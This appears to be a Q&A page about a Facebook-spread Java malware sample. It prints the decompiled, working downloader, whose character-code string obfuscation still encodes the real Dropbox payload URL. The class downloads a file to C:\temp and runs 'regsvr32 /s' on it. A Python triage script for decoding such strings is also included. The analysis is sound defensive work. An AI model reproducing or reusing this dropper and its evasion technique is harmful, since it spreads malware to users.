java - Code inside this undetectable malware
I have got this message 2 times on Facebook quoting "lol abc.rar". The abc.rar file has an executable jar file; once clicked it tries to connect to Facebook and enters the same message in chat randomly. I decompiled it using JD-GUI 0.36 and found a class czjffdqozxffyhrq inside the malware/virus; there is a manifest file inside it. I tried VirusTotal, it gives no results. Surely the threat has come to me from 2 Facebook friends of mine, unrelated to each other, so it's spreading fast. VirusTotal result: https://www.virustotal.com/en/file/a5ce78b2b3e3d6a98982ec300ff05abc8b56a5ed27b9b67b2e2fc417fc56a9df/analysis/1397065080/
Now the code of the class:

package com.cakes;

import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URL;

public class czjffdqozxffyhrq {

    // Every string constant is rebuilt at runtime from an array of character
    // codes, so no readable URL, path or command appears in the class file.

    // Decodes to the download URL.
    public static String mrdbdgwortilmglt() {
        int[] tdclrmdqriktvlkvmy = { 104, 116, 116, 112, 58, 47, 47, 100, 108, 46, 100, 114, 111, 112, 98, 111, 120, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 115, 47, 110, 108, 100, 113, 99, 116, 110, 98, 118, 108, 101, 122, 52, 50, 98, 47, 109, 111, 100, 117, 108, 101, 46, 100, 97, 116, 63, 100, 108, 61, 49 };
        StringBuilder cfmbxqxdanzahnu = new StringBuilder(tdclrmdqriktvlkvmy.length);
        for (int i = 0; i < tdclrmdqriktvlkvmy.length; i++) {
            cfmbxqxdanzahnu.append((char) tdclrmdqriktvlkvmy[i]);
        }
        return cfmbxqxdanzahnu.toString();
    }

    // Decodes to the full path of the dropped file under C:\temp.
    public static String olzezeaokmr() {
        int[] wwlytwss = { 67, 58, 92, 92, 116, 101, 109, 112, 92, 92, 113, 118, 115, 102, 99, 99, 106, 109, 46, 103, 116, 106 };
        StringBuilder uurwhymtb = new StringBuilder(wwlytwss.length);
        for (int i = 0; i < wwlytwss.length; i++) {
            uurwhymtb.append((char) wwlytwss[i]);
        }
        return uurwhymtb.toString();
    }

    // Decodes to the C:\temp directory.
    public static String wxujpwlzjfvvc() {
        int[] krihniioygdowfq = { 67, 58, 92, 92, 116, 101, 109, 112, 92, 92 };
        StringBuilder dmpxcpok = new StringBuilder(krihniioygdowfq.length);
        for (int i = 0; i < krihniioygdowfq.length; i++) {
            dmpxcpok.append((char) krihniioygdowfq[i]);
        }
        return dmpxcpok.toString();
    }

    // Decodes to the "regsvr32 /s <dropped file>" command line.
    public static String uwqeeyesndtlyfye() {
        int[] wwlytwsspath = { 114, 101, 103, 115, 118, 114, 51, 50, 32, 47, 115, 32, 67, 58, 92, 92, 116, 101, 109, 112, 92, 92, 113, 118, 115, 102, 99, 99, 106, 109, 46, 103, 116, 106 };
        StringBuilder eiljiba = new StringBuilder(wwlytwsspath.length);
        for (int i = 0; i < wwlytwsspath.length; i++) {
            eiljiba.append((char) wwlytwsspath[i]);
        }
        return eiljiba.toString();
    }

    // Runs the regsvr32 command six times.
    public static void bnyikewbdrqhetgb() throws IOException {
        int m = 1;
        while (m < 7) {
            Runtime.getRuntime().exec(uwqeeyesndtlyfye());
            m++;
        }
    }

    public static void main(String[] args) throws Exception {
        new File(wxujpwlzjfvvc()).mkdir();
        File u = new File(olzezeaokmr());
        if (u.exists()) {
            // Payload already present: just (re)register it.
            bnyikewbdrqhetgb();
        } else {
            // First run: download the payload, then register it.
            String pdisodea = mrdbdgwortilmglt();
            String lwpztudm = olzezeaokmr();
            lslmzhpvu(pdisodea, lwpztudm);
        }
    }

    // Downloads the URL in rklnt to the file nenyy, then registers it.
    public static void lslmzhpvu(String rklnt, String nenyy) throws IOException {
        URL hsnmxltpgt = new URL(rklnt);
        InputStream mlzfltpyqeoqdahzvel = hsnmxltpgt.openStream();
        OutputStream uxvkcl = new FileOutputStream(nenyy);
        byte[] b = new byte[432101];
        int length;
        while ((length = mlzfltpyqeoqdahzvel.read(b)) != -1) {
            uxvkcl.write(b, 0, length);
        }
        mlzfltpyqeoqdahzvel.close();
        uxvkcl.close();
        bnyikewbdrqhetgb();
    }
}
Can someone please explain how this is working, and why is it still not detectable?
Basically it downloads a file from:
http://dl.dropboxusercontent.com/s/nldqctnbvlez42b/******.dat?dl=1
(obfuscated link, I don't want anyone downloading it by mistake)
...to c:\temp, and registers it in the system using:
regsvr32 /s <filename>
The real evil is in the downloaded file (which I'm not going to download :) )
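A small static-triage helper for the obfuscation pattern in the decompiled class (every string rebuilt from an int[] of character codes), written in Python as an added example that is not part of the question or the answer. It runs over a constructed decompiled fragment with placeholder values (example.invalid, p.dat) rather than the real sample's arrays, and labels each decoded string as a URL, path, command or binary blob so an analyst can see the downloader's intent without executing it.

```python
"""Static triage for char-code string obfuscation in decompiled Java:
each string is an int[] of character codes appended one by one.
Added example for this page; not code from the question or the answer."""
import re
from typing import Dict, Tuple

# Matches `int[] name = { 1, 2, 3 };` declarations, including multi-line ones.
ARRAY_RE = re.compile(r"int\[\]\s+(\w+)\s*=\s*\{([^}]*)\}")

# Constructed decompiled fragment in the same shape as the posted class.
# Values are placeholders (example.invalid, p.dat), not the real sample's.
SAMPLE_SOURCE = """
int[] a = { 104, 116, 116, 112, 58, 47, 47, 101, 120, 97, 109, 112, 108, 101,
            46, 105, 110, 118, 97, 108, 105, 100, 47, 112, 46, 100, 97, 116 };
int[] b = { 67, 58, 92, 92, 116, 101, 109, 112, 92, 92, 112, 46, 100, 97, 116 };
int[] c = { 114, 101, 103, 115, 118, 114, 51, 50, 32, 47, 115, 32, 67, 58, 92,
            92, 116, 101, 109, 112, 92, 92, 112, 46, 100, 97, 116 };
int[] d = { 7, 0, 255 };
"""

def decode_array(body: str) -> str:
    """Rebuild the string exactly as the loop `sb.append((char) arr[i])` does."""
    return "".join(chr(int(tok)) for tok in body.split(",") if tok.strip())

def classify(text: str) -> str:
    """Label a decoded string by what a downloader would use it for."""
    if not text.isprintable():
        return "binary"
    low = text.lower()
    if re.match(r"^[a-z][a-z0-9+.-]*://", low):
        return "url"
    if low.split(" ")[0] in {"regsvr32", "rundll32", "cmd", "powershell"}:
        return "command"
    if re.match(r"^[a-z]:\\", low):
        return "path"
    return "text"

def extract_strings(source: str) -> Dict[str, Tuple[str, str]]:
    """Map each obfuscated array name to (decoded string, classification)."""
    result: Dict[str, Tuple[str, str]] = {}
    for name, body in ARRAY_RE.findall(source):
        decoded = decode_array(body)
        result[name] = (decoded, classify(decoded))
    return result

if __name__ == "__main__":
    for name, (text, kind) in extract_strings(SAMPLE_SOURCE).items():
        print(f"{name}: [{kind}] {text!r}")
```

Note that the Java code appends char 92 twice per separator, so decoded Windows paths carry doubled backslashes exactly as the runtime string does.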